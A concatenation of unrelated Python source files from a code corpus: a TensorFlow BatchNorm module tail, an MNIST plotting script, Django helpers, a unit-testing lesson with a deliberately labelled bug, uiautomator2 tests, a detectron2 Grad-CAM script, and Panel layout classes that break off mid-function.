regularizer=self._regularizers.get(self.GAMMA, None),
trainable=self._scale,
)
def _build(self, input_batch, is_training, test_local_stats=True):
"""Connects the BatchNorm module into the graph.
Args:
input_batch: A Tensor of arbitrary dimension. By default, the final
dimension is not reduced over when computing the minibatch statistics.
is_training: A boolean to indicate if the module should be connected in
training mode, meaning the moving averages are updated. Can be a Tensor.
test_local_stats: A boolean to indicate if local batch statistics should
be used when `is_training=False`. If not, moving averages are used.
By default `True`. Can be a Tensor.
Returns:
A tensor with the same shape as `input_batch`.
Raises:
base.IncompatibleShapeError: If `axis` is not valid for the
input shape or has negative entries.
base.NotSupportedError: If `input_batch` has data type of `tf.float16`.
"""
input_shape = input_batch.get_shape()
if self._axis is not None:
if len(self._axis) > len(input_shape):
raise base.IncompatibleShapeError(
"Too many indices specified in axis: len({}) > len({}).".format(self._axis, input_shape)
)
if max(self._axis) >= len(input_shape):
raise base.IncompatibleShapeError(
"One or more index in axis is too large for "
"input shape: {} >= {:d}.".format(self._axis, len(input_shape))
)
if min(self._axis) < 0:
raise base.IncompatibleShapeError("Indices in axis must be non-negative: {} < 0.".format(self._axis))
axis = self._axis
else:
# Reduce over all dimensions except the last.
axis = tuple(range(len(input_shape))[:-1])
dtype = input_batch.dtype.base_dtype
# Maintain moving averages at a minimum precision of tf.float32.
stat_dtype = tf.float32 if dtype == tf.float16 else dtype
self._mean_shape = input_batch.get_shape().as_list()
for index in axis:
self._mean_shape[index] = 1
use_batch_stats = is_training | test_local_stats
mean, variance = self._build_statistics(input_batch, axis, use_batch_stats, stat_dtype)
# Sets up optional gamma and beta parameters
self._build_scale_offset(dtype)
# Sets up the batch normalization op.
out, mean, variance = self._batch_norm_op(input_batch, mean, variance, use_batch_stats, stat_dtype)
# Sets up the update op.
update_ops = self._build_update_ops(mean, variance, is_training)
# Put update ops in the update ops collection if given, otherwise add as
# control dependencies of the output.
if update_ops:
if self._update_ops_collection:
for update_op in update_ops:
tf.add_to_collection(self._update_ops_collection, update_op)
else:
with tf.control_dependencies(update_ops):
out = tf.identity(out)
return out
@property
def initializers(self):
return self._initializers
@property
def partitioners(self):
return self._partitioners
@property
def regularizers(self):
return self._regularizers
@property
def moving_mean(self):
self._ensure_is_connected()
return self._moving_mean
@property
def moving_variance(self):
self._ensure_is_connected()
return self._moving_variance
@property
def beta(self):
self._ensure_is_connected()
if self._beta is None:
raise base.Error("Batch normalization doesn't have an offset, so no beta")
else:
return self._beta
@property
def gamma(self):
self._ensure_is_connected()
if self._gamma is None:
raise base.Error("Batch normalization doesn't have a scale, so no gamma")
else:
return self._gamma
|
the-stack_106_15780
|
import numpy as np
import matplotlib.pyplot as plt
import sys
def format_number(x):
return 255 - x.reshape((28,28))
def main(path="means.csv"):
means = np.genfromtxt(path, delimiter=',',dtype=np.uint8)[:,:-1]
print(means.shape)
for i in range(20):
plt.subplot(4,5,i+1)
plt.imshow(format_number(means[i,:]),cmap="Greys")
plt.xticks(())
plt.yticks(())
plt.show()
if __name__ == '__main__':
main(" ".join(sys.argv[1:]))
|
the-stack_106_15782
|
from collections import OrderedDict, MutableMapping
from copy import deepcopy
from django.db.models import F
def delete_keys_from_dict(dictionary):
"""
Recursive function to remove all keys from a dictionary/OrderedDict which
start with an underscore: "_"
parameters:
- dictionary: dictionary/OrderedDict
return:
OrderedDict
"""
modified_dict = OrderedDict()
for key, value in dictionary.items():
if not key.startswith("_"):
if isinstance(value, MutableMapping):
modified_dict[key] = delete_keys_from_dict(value)
else:
modified_dict[key] = deepcopy(value)
return modified_dict
def split_mapper_into_qs(mapper):
"""
Django ORM has trouble using .annotate() when the destination field conflicts with an
existing model field, even if it's the same source field (no renaming occuring)
Assuming there is a dictionary with model fieldnames as keys and the target field as the value,
Split that into two objects:
values_list: a list of fields which you wish to retrive without renaming
aka when `key` == `value`
annotate_dict: a dictionary/OrderedDict of target and source fields to rename
parameters
- mapper: dictionary/OrderedDict
return:
- values_list: list
-annotate_dict: OrderedDict
"""
values_list = [k for k, v in mapper.items() if k == v]
annotate_dict = OrderedDict([(v, F(k)) for k, v in mapper.items() if k != v])
return values_list, annotate_dict
|
the-stack_106_15783
|
"""
This module helps you understand:
-- UNIT TESTING.
-- the difference between PRINT and RETURN
Authors: David Mutchler, Dave Fisher, Vibha Alangar, Mark Hays, Amanda Stouder,
their colleagues and Owen Land.
"""
###############################################################################
#
# DONE: 1.
# Allow this module to use the rosegraphics.py module by marking the
# src
# folder in this project as a "Sources Root", as follows:
#
# In the Project window (to the left), right click on the src folder,
# then select Mark Directory As ~ Sources Root.
#
###############################################################################
import rosegraphics as rg
import math
def main():
""" Calls the TEST functions in this module. """
run_test_distance()
def run_test_distance():
""" Tests the distance function by using 3 tests. """
# Test 1:
expected = math.sqrt(2)
answer = distance(rg.Point(1, 1))
print('Test 1 expected:', expected)
print(' actual: ', answer)
# Test 2:
expected = 5
answer = distance(rg.Point(3, 4))
print('Test 2 expected:', expected)
print(' actual: ', answer)
# Test 3:
expected = 0
answer = distance(rg.Point(0, 0))
print('Test 3 expected:', expected)
print(' actual: ', answer)
def distance(point):
"""
What comes in: An rg.Point.
What goes out: The distance that the rg.Point is from (0, 0).
Side effects: None.
Example:
If the argument is rg.Point(3, 4) this function returns 5.
"""
# This code has an error, on purpose. Do NOT fix it.
x_squared = point.x * point.x
y_squared = point.y * point.x
return math.sqrt(x_squared + y_squared)
# ----------------------------------------------------------------------
# Calls main to start the ball rolling.
# ----------------------------------------------------------------------
main()
###############################################################################
# DONE: 2.
#
# READ the following, asking questions as needed.
# When you believe that you understading what is says about UNIT TESTING,
# mark the above TO-DO as DONE.
#
# In most exercises we will follow the UNIT TESTING
# that the above code illustrates.
#
# Look at the DISTANCE function defined above.
# It is the function that we want to test. Read its doc-string.
#
# Now look at the run_test_DISTANCE function defined above.
# It is the function that TESTS the DISTANCE function.
# We call this UNIT TESTING because we are testing a single UNIT
# of the program, here, the function DISTANCE.
#
# A run_test_blah function does the following several times:
#
# 1. The HUMAN tester figures out the CORRECT (EXPECTED) answer
# on a particular test case, usually by working the problem
# by hand or by trusting a test case provided by the instructor.
#
# For example, in the above run_test_DISTANCE function,
# the human tester figured out, by doing the problem by hand,
# that the distance that (3, 4) is from (0, 0) is 5:
# expected = 5
#
# 2. The run_test_DISTANCE function CALLS the function to test,
# sending it the test case the human tester chose:
# answer = distance(rg.Point(3, 4))
#
# The code CAPTURES the returned value in a variable (namely, answer).
#
# 3. The run_test_DISTANCE function then PRINTS both the EXPECTED
# answer (5 in our example) and the ACTUAL answer returned
# (the value of the variable answer).
# print('Test 3 expected:', expected)
# print(' actual: ', answer)
#
# The above forms a single TEST for a function that returns a value.
# When the software developer / tester runs the run_test_DISTANCE function,
# she compares the EXPECTED and ACTUAL values that are printed.
# -- If they are the same, the code PASSED the test.
# -- If they are different, the code FAILED the test.
#
# If the code failed the test, the software developer then uses tools
# like a debugger to find the source of the error and fix it.
# The error might be in the code (as in the above example)
# or in the test (if the human tester came up with a wrong answer).
#
# RUN this program now. Did the DISTANCE function pass its tests?
# (Answer: it passed TWO of its tests but NOT all three.)
#
# Testing is a BIG topic, but UNIT TESTING like the code above is a start.
#
# One more thing:
# Students sometimes confuse PRINT and RETURN because you will almost
# always test your functions using this
# capture-in-variable-then-print-variable
# approach. From that alone, it looks like the function could have
# PRINTED the result instead of RETURNing it.
# But remember -- in REAL programs, functions rarely print anything;
#
# ** Functions RETURN values for OTHER functions to use. **
#
# We are teaching you practices that scale up, so we demand that most
# of the functions that you write from here on RETURN a value instead
# of PRINTing it.
#
###############################################################################
|
the-stack_106_15785
|
# coding: utf-8
#
import uiautomator2 as u2
import pytest
import logging
import time
def test_set_xpath_debug(sess):
with pytest.raises(TypeError):
sess.settings['xpath_debug'] = 1
sess.settings['xpath_debug'] = True
assert sess.settings['xpath_debug'] == True
assert sess.xpath.logger.level == logging.DEBUG
sess.settings['xpath_debug'] = False
assert sess.settings['xpath_debug'] == False
assert sess.xpath.logger.level == logging.INFO
def test_wait_timeout(d):
d.settings['wait_timeout'] = 19.0
assert d.wait_timeout == 19.0
d.settings['wait_timeout'] = 10
assert d.wait_timeout == 10
d.implicitly_wait(15)
assert d.settings['wait_timeout'] == 15
def test_operation_delay(d: u2.Device):
x, y = d(text="App").center()
# 测试前延迟
start = time.time()
d.settings['operation_delay'] = (1, 0)
d.click(x, y)
time_used = time.time() - start
assert 1 < time_used < 1.5
# 测试后延迟
start = time.time()
d.settings['operation_delay_methods'] = ['press', 'click']
d.settings['operation_delay'] = (0, 2)
d.press("back")
time_used = time.time() - start
assert 2 < time_used < 2.5
# 测试operation_delay_methods
start = time.time()
d.settings['operation_delay_methods'] = ['press']
d.click(x, y)
time_used = time.time() - start
assert 0 < time_used < .5
|
the-stack_106_15789
|
import os
import numpy as np
import torch
import cv2
import argparse
from tqdm import tqdm
from detectron2 import model_zoo
from detectron2.config import CfgNode
import detectron2.data.transforms as T
from detectron2.config import get_cfg
from detectron2.checkpoint import DetectionCheckpointer
from detectron2.modeling import build_model
from grad_cam import GradCAM, GradCamPlusPlus
# This code only works for FasterRCNN_C4 architecture
# Can produce heatmap and heatmap++
# constant hardcoded
LAYER_NAME = "roi_heads.res5.2.conv3"
MODEL_ARCHI = "COCO-Detection/faster_rcnn_R_50_C4_1x.yaml"
def get_args():
parser = argparse.ArgumentParser(description="Detectron2 demo for builtin models")
parser.add_argument(
"--clsname_list",
nargs="*",
type=str,
default=['plane'],
help="List of class name that your model is trained for, background class is not counted",
)
parser.add_argument(
"--device",
type=str,
default='cuda',
)
parser.add_argument(
"--conf",
type=float,
default=0.5,
help="Minimum score for instance predictions to be shown",
)
parser.add_argument(
"--method",
type=str,
choices=['gradcam','gradcam++'],
default='gradcam',
help="Visualization method to use",
)
parser.add_argument(
"--pretrained",
type=str,
help="Path to .pth or .pkl pretrained detectron2 model that you want to visualize",
)
parser.add_argument(
"--img_folder",
type=str,
help="A directory contains all images to be detected",
)
parser.add_argument(
"--output",
help="A directory to save output visualizations."
)
return parser.parse_args()
def get_model(args) -> torch.nn.Module:
# load config from file and command-line arguments
cfg = get_cfg()
cfg.merge_from_file(model_zoo.get_config_file(MODEL_ARCHI))
cfg.MODEL.WEIGHTS = args.pretrained
# Set the number of classes
cfg.MODEL.ROI_HEADS.NUM_CLASSES = len(args.clsname_list)
cfg.MODEL.DEVICE = args.device
# Set score_threshold for builtin models
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.conf
cfg.freeze()
print(cfg)
model = build_model(cfg)
checkpointer = DetectionCheckpointer(model)
checkpointer.load(cfg.MODEL.WEIGHTS)
return model, cfg
def get_img_input_dict(d2_cfg: CfgNode, img_path: str) -> dict:
original_image = cv2.imread(img_path)
height, width = original_image.shape[:2]
transform_gen = T.ResizeShortestEdge(
[d2_cfg.INPUT.MIN_SIZE_TEST, d2_cfg.INPUT.MIN_SIZE_TEST], d2_cfg.INPUT.MAX_SIZE_TEST
)
image = transform_gen.get_transform(original_image).apply_image(original_image)
image = torch.as_tensor(image.astype("float32").transpose(2, 0, 1)).requires_grad_(True)
inputs = {"image": image, "height": height, "width": width}
return inputs
def combine_mask_to_img(image, mask):
image = image.copy()
heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
# heatmap = heatmap[..., ::-1] # gbr to rgb
image = 0.3 * heatmap + np.float32(image/255)
image /= np.max(image)
image *= 255.
return np.uint8(image)
def save_heatmaps(
original_img: np.ndarray,
result_list: list,
output_folder: str,
img_name: str,
clsname_list: list):
for i, result_dict in enumerate(result_list):
x1, y1, x2, y2 = result_dict['box']
conf = result_dict['conf']
cls_id = result_dict['class_id']
mask = result_dict['cam']
cls_name = clsname_list[cls_id]
crop_area = original_img[y1:y2, x1:x2]
heatmap = combine_mask_to_img(crop_area, mask)
output_path = os.path.join(output_folder,
'{}_obj_{}_{}_{:.2f}.jpg'.format(img_name, i, cls_name, conf))
# resize to make it larger
scale = 10
heatmap = cv2.resize(heatmap, (heatmap.shape[0]*scale, heatmap.shape[1]*10), interpolation = cv2.INTER_CUBIC)
cv2.imwrite(output_path, heatmap)
# inference on a single image
def gradcam_single_img(args, cfg, gradcam_model, img_path: str, output_folder: str):
input_dict = get_img_input_dict(cfg, img_path)
result_list = gradcam_model.get_mask_all_detection(input_dict)
#save image (with all your format)
img_name = os.path.basename(img_path)
output_folder = os.path.join(output_folder, args.method)
os.makedirs(output_folder, exist_ok=True)
original_img = cv2.imread(img_path)
save_heatmaps(original_img, result_list, output_folder, img_name, args.clsname_list)
def gradcam(method: str, model):
if method == 'gradcam':
return GradCAM(model, LAYER_NAME)
elif method == 'gradcam++':
return GradCamPlusPlus(model, LAYER_NAME)
# inference on the folder
# just call on single image multiple time
def main(args):
model, cfg = get_model(args)
gradcam_model = gradcam(args.method, model)
for img_file in tqdm(os.listdir(args.img_folder)):
img_path = os.path.join(args.img_folder, img_file)
gradcam_single_img(args, cfg, gradcam_model, img_path, args.output)
if __name__ == "__main__":
"""
python detection/batch_heatmap.py --pretrained pretrained_model/your_model.pth \
--img_folder ./your_folder \
--output ./your_output_folder \
"""
arguments = get_args()
main(arguments)
|
the-stack_106_15790
|
"""
Defines Layout classes which may be used to arrange panes and widgets
in flexible ways to build complex dashboards.
"""
from __future__ import absolute_import, division, unicode_literals
from collections import OrderedDict
import param
import numpy as np
from bokeh.models import (Column as BkColumn, Row as BkRow,
Spacer as BkSpacer, GridBox as BkGridBox,
Box as BkBox, Markup as BkMarkup)
from bokeh.models.widgets import Tabs as BkTabs, Panel as BkPanel
from .util import param_name, param_reprs
from .viewable import Reactive
class Panel(Reactive):
"""
Abstract baseclass for a layout of Viewables.
"""
objects = param.Parameter(default=[], doc="""
The list of child objects that make up the layout.""")
_bokeh_model = None
__abstract = True
_rename = {'objects': 'children'}
_linked_props = []
def __repr__(self, depth=0, max_depth=10):
if depth > max_depth:
return '...'
spacer = '\n' + (' ' * (depth+1))
cls = type(self).__name__
params = param_reprs(self, ['objects'])
objs = ['[%d] %s' % (i, obj.__repr__(depth+1)) for i, obj in enumerate(self)]
if not params and not objs:
return super(Panel, self).__repr__(depth+1)
elif not params:
template = '{cls}{spacer}{objs}'
elif not objs:
template = '{cls}({params})'
else:
template = '{cls}({params}){spacer}{objs}'
return template.format(
cls=cls, params=', '.join(params),
objs=('%s' % spacer).join(objs), spacer=spacer)
#----------------------------------------------------------------
# Callback API
#----------------------------------------------------------------
def _update_model(self, events, msg, root, model, doc, comm=None):
if self._rename['objects'] in msg:
old = events['objects'].old
msg[self._rename['objects']] = self._get_objects(model, old, doc, root, comm)
model.update(**msg)
from .io import state
ref = root.ref['id']
if ref in state._views:
state._views[ref][0]._preprocess(root)
#----------------------------------------------------------------
# Model API
#----------------------------------------------------------------
def _init_properties(self):
properties = {k: v for k, v in self.param.get_param_values()
if v is not None}
del properties['objects']
return self._process_param_change(properties)
def _get_objects(self, model, old_objects, doc, root, comm=None):
"""
Returns new child models for the layout while reusing unchanged
models and cleaning up any dropped objects.
"""
from .pane import panel
new_models = []
for i, pane in enumerate(self.objects):
pane = panel(pane)
self.objects[i] = pane
if pane in old_objects:
child, _ = pane._models[root.ref['id']]
else:
child = pane._get_model(doc, root, model, comm)
new_models.append(child)
for obj in old_objects:
if obj not in self.objects:
obj._cleanup(root)
return new_models
def _get_model(self, doc, root=None, parent=None, comm=None):
model = self._bokeh_model()
if root is None:
root = model
objects = self._get_objects(model, [], doc, root, comm)
props = dict(self._init_properties(), objects=objects)
model.update(**self._process_param_change(props))
self._models[root.ref['id']] = (model, parent)
self._link_props(model, self._linked_props, doc, root, comm)
return model
def _cleanup(self, root):
super(Panel, self)._cleanup(root)
for p in self.objects:
p._cleanup(root)
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
def select(self, selector=None):
"""
Iterates over the Viewable and any potential children in the
applying the Selector.
Arguments
---------
selector: type or callable or None
The selector allows selecting a subset of Viewables by
declaring a type or callable function to filter by.
Returns
-------
viewables: list(Viewable)
"""
objects = super(Panel, self).select(selector)
for obj in self:
objects += obj.select(selector)
return objects
class ListPanel(Panel):
"""
An abstract baseclass for Panel objects with list-like children.
"""
margin = param.Parameter(default=0, doc="""
Allows to create additional space around the component. May
be specified as a two-tuple of the form (vertical, horizontal)
or a four-tuple (top, right, bottom, left).""")
objects = param.List(default=[], doc="""
The list of child objects that make up the layout.""")
__abstract = True
def __init__(self, *objects, **params):
from .pane import panel
if objects:
if 'objects' in params:
raise ValueError("A %s's objects should be supplied either "
"as positional arguments or as a keyword, "
"not both." % type(self).__name__)
params['objects'] = [panel(pane) for pane in objects]
super(Panel, self).__init__(**params)
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
def __getitem__(self, index):
return self.objects[index]
def __len__(self):
return len(self.objects)
def __iter__(self):
for obj in self.objects:
yield obj
def __contains__(self, obj):
return obj in self.objects
def __setitem__(self, index, panes):
from .pane import panel
new_objects = list(self)
if not isinstance(index, slice):
start, end = index, index+1
if start > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(end, type(self).__name__, len(self.objects)))
panes = [panes]
else:
start = index.start or 0
end = len(self) if index.stop is None else index.stop
if index.start is None and index.stop is None:
if not isinstance(panes, list):
raise IndexError('Expected a list of objects to '
'replace the objects in the %s, '
'got a %s type.' %
(type(self).__name__, type(panes).__name__))
expected = len(panes)
new_objects = [None]*expected
end = expected
elif end > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(end, type(self).__name__, len(self.objects)))
else:
expected = end-start
if not isinstance(panes, list) or len(panes) != expected:
raise IndexError('Expected a list of %d objects to set '
'on the %s to match the supplied slice.' %
(expected, type(self).__name__))
for i, pane in zip(range(start, end), panes):
new_objects[i] = panel(pane)
self.objects = new_objects
def clone(self, *objects, **params):
"""
Makes a copy of the layout sharing the same parameters.
Arguments
---------
objects: Objects to add to the cloned layout.
params: Keyword arguments override the parameters on the clone.
Returns
-------
Cloned layout object
"""
if not objects:
if 'objects' in params:
objects = params.pop('objects')
else:
objects = self.objects
elif 'objects' in params:
raise ValueError("A %s's objects should be supplied either "
"as arguments or as a keyword, not both."
% type(self).__name__)
p = dict(self.param.get_param_values(), **params)
del p['objects']
return type(self)(*objects, **params)
def append(self, obj):
"""
Appends an object to the layout.
Arguments
---------
obj (object): Panel component to add to the layout.
"""
from .pane import panel
new_objects = list(self)
new_objects.append(panel(obj))
self.objects = new_objects
def clear(self):
"""
Clears the objects on this layout.
"""
self.objects = []
def extend(self, objects):
"""
Extends the objects on this layout with a list.
Arguments
---------
objects (list): List of panel components to add to the layout.
"""
from .pane import panel
new_objects = list(self)
new_objects.extend(list(map(panel, objects)))
self.objects = new_objects
def insert(self, index, obj):
"""
Inserts an object in the layout at the specified index.
Arguments
---------
index (int): Index at which to insert the object.
object (object): Panel components to insert in the layout.
"""
from .pane import panel
new_objects = list(self)
new_objects.insert(index, panel(obj))
self.objects = new_objects
def pop(self, index):
"""
Pops an item from the layout by index.
Arguments
---------
index (int): The index of the item to pop from the layout.
"""
new_objects = list(self)
if index in new_objects:
index = new_objects.index(index)
obj = new_objects.pop(index)
self.objects = new_objects
return obj
def remove(self, obj):
"""
Removes an object from the layout.
Arguments
---------
obj (object): The object to remove from the layout.
"""
new_objects = list(self)
new_objects.remove(obj)
self.objects = new_objects
def reverse(self):
"""
Reverses the objects in the layout.
"""
new_objects = list(self)
new_objects.reverse()
self.objects = new_objects
class Row(ListPanel):
"""
Horizontal layout of Viewables.
"""
_bokeh_model = BkRow
class Column(ListPanel):
"""
Vertical layout of Viewables.
"""
_bokeh_model = BkColumn
class WidgetBox(Column):
"""
Vertical layout of widgets.
"""
css_classes = param.List(default=['widget-box'], doc="""
CSS classes to apply to the layout.""")
margin = param.Parameter(default=5, doc="""
Allows to create additional space around the component. May
be specified as a two-tuple of the form (vertical, horizontal)
or a four-tuple (top, right, bottom, left).""")
class Tabs(ListPanel):
"""
Panel of Viewables to be displayed in separate tabs.
"""
active = param.Integer(default=0, doc="""
Number of the currently active tab.""")
closable = param.Boolean(default=False, doc="""
Whether it should be possible to close tabs.""")
objects = param.List(default=[], doc="""
The list of child objects that make up the tabs.""")
tabs_location = param.ObjectSelector(
default='above', objects=['above', 'below', 'left', 'right'], doc="""
The location of the tabs relative to the tab contents.""")
height = param.Integer(default=None, bounds=(0, None))
width = param.Integer(default=None, bounds=(0, None))
_bokeh_model = BkTabs
_rename = {'objects': 'tabs'}
_linked_props = ['active']
def __init__(self, *items, **params):
if 'objects' in params:
if items:
raise ValueError('Tabs objects should be supplied either '
'as positional arguments or as a keyword, '
'not both.')
items = params['objects']
objects, self._names = self._to_objects_and_names(items)
super(Tabs, self).__init__(*objects, **params)
self.param.watch(self._update_names, 'objects')
# ALERT: Ensure that name update happens first, should be
# replaced by watch precedence support in param
self._param_watchers['objects']['value'].reverse()
def _to_object_and_name(self, item):
from .pane import panel
if isinstance(item, tuple):
name, item = item
else:
name = getattr(item, 'name', None)
pane = panel(item, name=name)
name = param_name(pane.name) if name is None else name
return pane, name
def _to_objects_and_names(self, items):
objects, names = [], []
for item in items:
pane, name = self._to_object_and_name(item)
objects.append(pane)
names.append(name)
return objects, names
def _init_properties(self):
return {k: v for k, v in self.param.get_param_values()
if v is not None and k != 'closable'}
#----------------------------------------------------------------
# Callback API
#----------------------------------------------------------------
def _update_names(self, event):
if len(event.new) == len(self._names):
return
names = []
for obj in event.new:
if obj in event.old:
index = event.old.index(obj)
name = self._names[index]
else:
name = obj.name
names.append(name)
self._names = names
#----------------------------------------------------------------
# Model API
#----------------------------------------------------------------
def _update_model(self, events, msg, root, model, doc, comm=None):
if 'closable' in msg:
closable = msg.pop('closable')
for child in model.tabs:
child.closable = closable
super(Tabs, self)._update_model(events, msg, root, model, doc, comm)
def _get_objects(self, model, old_objects, doc, root, comm=None):
"""
Returns new child models for the layout while reusing unchanged
models and cleaning up any dropped objects.
"""
from .pane import panel
new_models = []
if len(self._names) != len(self):
raise ValueError('Tab names do not match objects, ensure '
'that the Tabs.objects are not modified '
'directly. Found %d names, expected %d.' %
(len(self._names), len(self)))
for i, (name, pane) in enumerate(zip(self._names, self)):
pane = panel(pane, name=name)
self.objects[i] = pane
if pane in old_objects:
child, _ = pane._models[root.ref['id']]
else:
child = pane._get_model(doc, root, model, comm)
child = BkPanel(title=name, name=pane.name, child=child,
closable=self.closable)
new_models.append(child)
for obj in old_objects:
if obj not in self.objects:
obj._cleanup(root)
return new_models
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
def __setitem__(self, index, panes):
new_objects = list(self)
if not isinstance(index, slice):
if index > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(index, type(self).__name__, len(self.objects)))
start, end = index, index+1
panes = [panes]
else:
start = index.start or 0
end = len(self.objects) if index.stop is None else index.stop
if index.start is None and index.stop is None:
if not isinstance(panes, list):
raise IndexError('Expected a list of objects to '
'replace the objects in the %s, '
'got a %s type.' %
(type(self).__name__, type(panes).__name__))
expected = len(panes)
new_objects = [None]*expected
self._names = [None]*len(panes)
end = expected
else:
expected = end-start
if end > len(self.objects):
raise IndexError('Index %d out of bounds on %s '
'containing %d objects.' %
(end, type(self).__name__, len(self.objects)))
if not isinstance(panes, list) or len(panes) != expected:
raise IndexError('Expected a list of %d objects to set '
'on the %s to match the supplied slice.' %
(expected, type(self).__name__))
for i, pane in zip(range(start, end), panes):
new_objects[i], self._names[i] = self._to_object_and_name(pane)
self.objects = new_objects
def clone(self, *objects, **params):
"""
Makes a copy of the Tabs sharing the same parameters.
Arguments
---------
objects: Objects to add to the cloned Tabs object.
params: Keyword arguments override the parameters on the clone.
Returns
-------
Cloned Tabs object
"""
if not objects:
if 'objects' in params:
objects = params.pop('objects')
else:
objects = zip(self._names, self.objects)
elif 'objects' in params:
raise ValueError('Tabs objects should be supplied either '
'as positional arguments or as a keyword, '
'not both.')
p = dict(self.param.get_param_values(), **params)
del p['objects']
return type(self)(*objects, **params)
def append(self, pane):
"""
Appends an object to the tabs.
Arguments
---------
obj (object): Panel component to add as a tab.
"""
new_object, new_name = self._to_object_and_name(pane)
new_objects = list(self)
new_objects.append(new_object)
self._names.append(new_name)
self.objects = new_objects
def clear(self):
"""
Clears the tabs.
"""
self._names = []
self.objects = []
def extend(self, panes):
"""
Extends the the tabs with a list.
Arguments
---------
objects (list): List of panel components to add as tabs.
"""
new_objects, new_names = self._to_objects_and_names(panes)
objects = list(self)
objects.extend(new_objects)
self._names.extend(new_names)
self.objects = objects
def insert(self, index, pane):
"""
Inserts an object in the tabs at the specified index.
Arguments
---------
index (int): Index at which to insert the object.
object (object): Panel components to insert as tabs.
"""
new_object, new_name = self._to_object_and_name(pane)
new_objects = list(self.objects)
new_objects.insert(index, new_object)
self._names.insert(index, new_name)
self.objects = new_objects
def pop(self, index):
"""
Pops an item from the tabs by index.
Arguments
---------
index (int): The index of the item to pop from the tabs.
"""
new_objects = list(self)
if index in new_objects:
index = new_objects.index(index)
new_objects.pop(index)
self._names.pop(index)
self.objects = new_objects
def remove(self, pane):
"""
Removes an object from the tabs.
Arguments
---------
obj (object): The object to remove from the tabs.
"""
new_objects = list(self)
if pane in new_objects:
index = new_objects.index(pane)
new_objects.remove(pane)
self._names.pop(index)
self.objects = new_objects
def reverse(self):
"""
Reverses the tabs.
"""
new_objects = list(self)
new_objects.reverse()
self._names.reverse()
self.objects = new_objects
class GridSpec(Panel):
objects = param.Dict(default={}, doc="""
The dictionary of child objects that make up the grid.""")
mode = param.ObjectSelector(
default='warn', objects=['warn', 'error', 'override'], doc="""
Whether to warn, error or simply override on overlapping
assignment.""")
width = param.Integer(default=600)
height = param.Integer(default=600)
_bokeh_model = BkGridBox
_rename = {'objects': 'children', 'mode': None}
def __init__(self, **params):
if 'objects' not in params:
params['objects'] = OrderedDict()
super(GridSpec, self).__init__(**params)
def _init_properties(self):
properties = super(GridSpec, self)._init_properties()
if self.sizing_mode not in ['fixed', None]:
if 'min_width' not in properties and 'width' in properties:
properties['min_width'] = properties['width']
if 'min_height' not in properties and 'height' in properties:
properties['min_height'] = properties['height']
return properties
def _get_objects(self, model, old_objects, doc, root, comm=None):
if self.ncols:
width = int(float(self.width)/self.ncols)
else:
width = 0
if self.nrows:
height = int(float(self.height)/self.nrows)
else:
height = 0
children = []
for (y0, x0, y1, x1), obj in self.objects.items():
x0 = 0 if x0 is None else x0
x1 = (self.ncols) if x1 is None else x1
y0 = 0 if y0 is None else y0
y1 = (self.nrows) if y1 is None else y1
r, c, h, w = (y0, x0, y1-y0, x1-x0)
if self.sizing_mode in ['fixed', None]:
properties = {'width': w*width, 'height': h*height}
else:
properties = {'sizing_mode': self.sizing_mode}
obj.set_param(**properties)
model = obj._get_model(doc, root, model, comm)
if isinstance(model, BkMarkup) and self.sizing_mode not in ['fixed', None]:
if model.style is None:
model.style = {}
style = {}
if 'width' not in model.style:
style['width'] = '100%'
if 'height' not in model.style:
style['height'] = '100%'
if style:
model.style.update(style)
if isinstance(model, BkBox) and len(model.children) == 1:
model.children[0].update(**properties)
else:
model.update(**properties)
children.append((model, r, c, h, w))
new_objects = list(self.objects.values())
if isinstance(old_objects, dict):
old_objects = list(old_objects.values())
for old in old_objects:
if old not in new_objects:
old._cleanup(root)
return children
@property
def _xoffset(self):
min_xidx = [x0 for (_, x0, _, _) in self.objects if x0 is not None]
return min(min_xidx) if min_xidx and len(min_xidx) == len(self.objects) else 0
@property
def _yoffset(self):
min_yidx = [y0 for (y0, x0, _, _) in self.objects if y0 is not None]
return min(min_yidx) if min_yidx and len(min_yidx) == len(self.objects) else 0
@property
def _object_grid(self):
grid = np.full((self.nrows, self.ncols), None)
for i, ((y0, x0, y1, x1), obj) in enumerate(self.objects.items()):
l = 0 if x0 is None else x0
r = self.ncols if x1 is None else x1
t = 0 if y0 is None else y0
b = self.nrows if y1 is None else y1
for y in range(t, b):
for x in range(l, r):
grid[y, x] = {((y0, x0, y1, x1), obj)}
return grid
#----------------------------------------------------------------
# Public API
#----------------------------------------------------------------
@property
def nrows(self):
max_yidx = [y1 for (_, _, y1, _) in self.objects if y1 is not None]
return max(max_yidx) if max_yidx else 0
@property
def ncols(self):
max_xidx = [x1 for (_, _, _, x1) in self.objects if x1 is not None]
return max(max_xidx) if max_xidx else 0
@property
def grid(self):
grid = np.zeros((self.nrows, self.ncols), dtype='uint8')
for (y0, x0, y1, x1) in self.objects:
x0 = 0 if x0 is None else x0
x1 = self.ncols if x1 is None else x1
y0 = 0 if y0 is None else y0
y1 = self.nrows if y1 is None else y1
grid[y0:y1, x0:x1] += 1
return grid
def clone(self, **params):
"""
Makes a copy of the GridSpec sharing the same parameters.
Arguments
---------
params: Keyword arguments override the parameters on the clone.
Returns
-------
Cloned GridSpec object
"""
p = dict(self.param.get_param_values(), **params)
return type(self)(**p)
def __iter__(self):
for obj in self.objects.values():
yield obj
def __delitem__(self, index, trigger=True):
if isinstance(index, tuple):
yidx, xidx = index
else:
yidx, xidx = index, slice(None)
subgrid = self._object_grid[yidx, xidx]
if isinstance(subgrid, np.ndarray):
deleted = OrderedDict([list(o)[0] for o in subgrid.flatten()])
else:
deleted = [list(subgrid)[0][0]]
if deleted:
for key in deleted:
del self.objects[key]
if trigger:
self.param.trigger('objects')
def __getitem__(self, index):
if isinstance(index, tuple):
yidx, xidx = index
else:
yidx, xidx = index, slice(None)
subgrid = self._object_grid[yidx, xidx]
if isinstance(subgrid, np.ndarray):
params = dict(self.get_param_values())
params['objects'] = OrderedDict([list(o)[0] for o in subgrid.flatten()])
gspec = GridSpec(**params)
xoff, yoff = gspec._xoffset, gspec._yoffset
adjusted = []
